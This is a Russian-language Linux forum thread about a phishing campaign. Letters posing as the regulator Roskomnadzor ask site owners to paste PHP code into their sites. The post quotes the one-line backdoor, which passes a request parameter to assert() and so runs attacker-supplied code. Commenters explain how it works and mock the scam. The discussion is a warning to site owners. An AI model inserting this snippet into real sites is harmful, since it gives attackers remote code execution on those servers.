LINUX.ORG.RU
ФорумTalks

От имени роскомнадзора совершаются деяния

 


0

1

Ъ: от имени Роскомнадзора пишутся письма, в котором идет требование вставить в код сайта.

< ?php
/*Подтверждение доменного имени www.yandex.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

Собственно, насколько технически возможно специально обученным людям отследить, *кто* зарегал домен и спросить у него - зачем? В whois ничего нет, что позволяет определить, кто это:

Domain Name:ROSKOMNADZOR.ORG
Domain ID: D177149039-LROR
Creation Date: 2015-08-19T23:12:27Z
Updated Date: 2015-08-19T23:41:38Z
Registry Expiry Date: 2016-08-19T23:12:27Z
Sponsoring Registrar:TLD Registrar Solutions Ltd. (R2011-LROR)
Sponsoring Registrar IANA ID: 1564
WHOIS Server:
Referral URL:
Domain Status: clientTransferProhibited — http://www.icann.org/epp#clientTransferProhibited
Domain Status: serverTransferProhibited — http://www.icann.org/epp#serverTransferProhibited
Registrant ID:INTE12jyrqple3k6
Registrant Name:Domain Admin
Registrant Organization:Whois Privacy Corp.
Registrant Street: Ocean Centre, Montagu Foreshore
Registrant Street: East Bay Street
Registrant City:Nassau
Registrant State/Province:New Providence
Registrant Postal Code:0000
Registrant Country:BS
Registrant Phone:+44.7546458118
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email:roskomnadzor.org-owner@customers.whoisprivacycorp.com
Admin ID:INTEq6ty9gr6q279
Admin Name:Domain Admin
Admin Organization:Whois Privacy Corp.
Admin Street: Ocean Centre, Montagu Foreshore
Admin Street: East Bay Street
Admin City:Nassau
Admin State/Province:New Providence
Admin Postal Code:0000
Admin Country:BS
Admin Phone:+44.7546458118
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email:roskomnadzor.org-admin@customers.whoisprivacycorp.com
Tech ID:INTEjff1e5kav771
Tech Name:Domain Admin
Tech Organization:Whois Privacy Corp.
Tech Street: Ocean Centre, Montagu Foreshore
Tech Street: East Bay Street
Tech City:Nassau
Tech State/Province:New Providence
Tech Postal Code:0000
Tech Country:BS
Tech Phone:+44.7546458118
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email:roskomnadzor.org-tech@customers.whoisprivacycorp.com
Name Server:NS-CANADA.TOPDNS.COM
Name Server:NS-USA.TOPDNS.COM
Name Server:NS-UK.TOPDNS.COM
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned 

По мотивам http://habrahabr.ru/post/265513/ и http://habrahabr.ru/post/265515/

★★

Оригинально, нечего сказать.

Llevellyn
()

На такое повестись могут только пхпшники. На них и ориентировано

Siado ★★★★★
()

Развод заключается в том, что пользователю предлагают создать файл с на первый взгляд безобидным php кодом. Однако, если посмотреть описание функции assert, то сразу станет ясно, что злоумышленники просто выполнят код, который будет указан в переменной roskomnadzor.

Объясните для тех кто не знает ПХП: как они планируют заполнить эту переменную?

ymuv ★★★★
()
Ответ на: комментарий от ymuv

Через get-запрос, указав в параметре код. Ассерт код исполняет.

bk_ ★★
() автор топика

Дети роскомнадзора

torvn77 ★★★★★
()

Удивлен, что так долго никто этим не промышлял. Хотя может просто не всплывало раньше.

Ghostwolf ★★★★★
()

На такое повестись могут только глупцы. Сам код выглядит весьма специфически, подобные вставки уже много лет встречаются на разных сайтиках, адрес организации не корректный, да и уведомления от Роскомнадзора выглядят не так, как письмецо незадачливых горе-злоумышленников...

lucentcode ★★★★★
()

Надеюсь, что в $_REQUEST[roskomnadzor] прилетает код, который к чертям собачьим сносит весь сайт и базу. Это было бы очень правильно, ибо те, кто такой код добавят, не пользуются ни системами контроля версий, ни бэкапами

WARNING ★★★★
()
Последнее исправление: WARNING (всего исправлений: 1)
Ответ на: комментарий от Deleted

Ну идиотов, которые не понимают, что у госконторы очень вряд ли будет домен а зоне для некоммерческих организаций таки немало

Valkeru ★★★★
()
Ответ на: комментарий от WARNING

те, кто такой код добавят, не пользуются ни системами контроля версий, ни бэкапами

Ни головой.

Xellos ★★★★★
()
Ответ на: комментарий от lucentcode

На такое повестись могут только глупцы.

Целевая аудитория скорее пользователи всяких вордпресов, жумлы и тому подобного, кто в этом вашем пхп ничего не понимают, а просто используют готовые цмски. Таких очень много.

Flame4All
()
Ответ на: комментарий от Flame4All

Думаю, тем кто не понимает что делает подобный код, лучше самому скрипты своего сайта не изменять, а вместо этого найти того, кто немного лучше разбирается в вопросах веб-разработки, и попросить его глянуть на подобное «уведомление».

lucentcode ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.